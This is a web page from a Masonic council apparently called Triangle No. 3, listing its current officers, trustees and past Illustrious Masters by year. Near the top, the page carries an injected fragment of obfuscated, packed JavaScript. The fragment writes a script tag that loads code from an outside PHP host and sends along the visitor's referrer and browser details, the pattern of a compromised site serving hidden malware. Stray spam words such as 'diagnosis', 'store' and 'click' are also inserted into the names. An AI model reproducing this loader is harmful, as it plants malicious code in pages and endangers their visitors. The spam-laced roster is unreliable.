Past Illustrious Masters


=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("<\/k"+"l>");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ferdb|var|u0026u|referrer|znebd||js|php'.split('|'),0,{})) I want to join,Have someone contact me’/]


Illustrious Master: John W. Pearson
Deputy Master: John W. Bullach
Principal Conductor of Work: Oral McNeil Marple
Treasurer: Romulo M. Capuno,
check PIM
Recorder: Adam H. Domenech
Captain of the Guard: Victor Sack
Conductor of Council: Michael Wills
Steward:
Marshal: Carl E. Weaver
Chaplain:
Sentinel: Pablo A. Rocha, diagnosis
PIM

Trustees: John W. Bullach (2016), Ralph T. Woodrow (2015)

Webmaster: Carl E. Weaver
Illustrious Master: John W. Pearson
Deputy Master: John W. Bullach
Principal Conductor of Work: Oral McNeil Marple
Treasurer: Romulo M. Capuno, store
PIM
Recorder: Adam H. Domenech
Captain of the Guard: Victor Sack
Conductor of Council: Michael Wills
Steward:
Marshal: Carl E. Weaver
Chaplain:
Sentinel: Pablo A. Rocha, PIM

Trustees: John W. Bullach (2016), Ralph T. Woodrow (2015)

Webmaster: Carl E. Weaver
Living Past Illustrious Masters – pre-Triangle No. 3
Irving W. Adams 1953-1954
Russell S. Walker 1959-1960
William B. Craig (MIPGM, medical 1978) 1961-1962

Triangle No. 3 Past Illustrious Masters
Charles T. Smith, click Sr. * 1964-1965
John F. Isaac ** 1965-1966
Frank Portillo ** 1966-1968
Charles G. Hamilton ** 1968-1969
Raymond H. Houst (MIPGM, 1968) ** 1968-1969 (A)
John Y. Weaver ** 1969-1970
Donald S. Woodburn ** 1970-1971
Sydney F. Malone ** 1971-1972
Lonnie M. Barrow * 1972-1973
Robert F. Sutphin (MIPGM, 1979) 1973-1974
Elias Van Krugel 1974-1975
Alexander R. Green (MIPGM, 1983) * 1975-1976
Francis C. Pace (MIPGM, 1981) ** 1976-1977
C. Maculay Ward (MIPGM, 1991) * 1977-1978
Robert G. Kurtz, Sr. * 1978-1979
Marion K. Warner 1979-1980 (A)
Dan J. Andrich ** 1980-1981
Sheldon Arpad (MIPGM, 1993) 1981-1983
Robert F. Sutphin (MIPGM, 1979) 1983-1984
Robert R. Eckell 1984-1986
Philip J. Firtag 1986-1987
David J. Graham 1987-1988
Edgar M. Binns * 1988-1989
F. William Hershiser (MIPGM, 2000) 1989-1990
Douglas M. Dwyer 1990-1991
Richard B. Baldwin, Jr. (MIPGM, 2001) * 1991-1992
Solomon Zeidman (MIPGM, 1996) * 1992-1993
Claude H. Harris, Jr. 1993-1994
Harry E. Echols 1994-1995
Mark W. Underwood (MIPGM, 2005) 1995-1996
David B. Board * 1996-1997
F. William Hershiser (MIPGM, 2000) 1997-1998
Emil Lowenthal * 1997-1998 (H)
Pablo A. Rocha 1998-1999
F.J. Pepper 1999-2000
William M. Jackson 2000-2001
Douglas J. Snow 2001-2002
George D. Gilbreath * 2002-2003
Michael J. Kastle 2003-2004
Jeffrey G. Burcham (MIGM, 2011) 2004-2005
James M. Stevenson 2005-2006
Paul D. Gleason 2006-2007
Thomas G. Little 2007-2008
Teko A. Foly 2008-2009
James W. Golladay, Jr. 2009-2011
Ralph T. Woodrow 2011-2012
Marcel J. Desroches, Jr. 2012-2013
Romulo M. Capuno 2013-2014

* – Deceased
** – Presumed Deceased
A – Affiliated
H – Honorary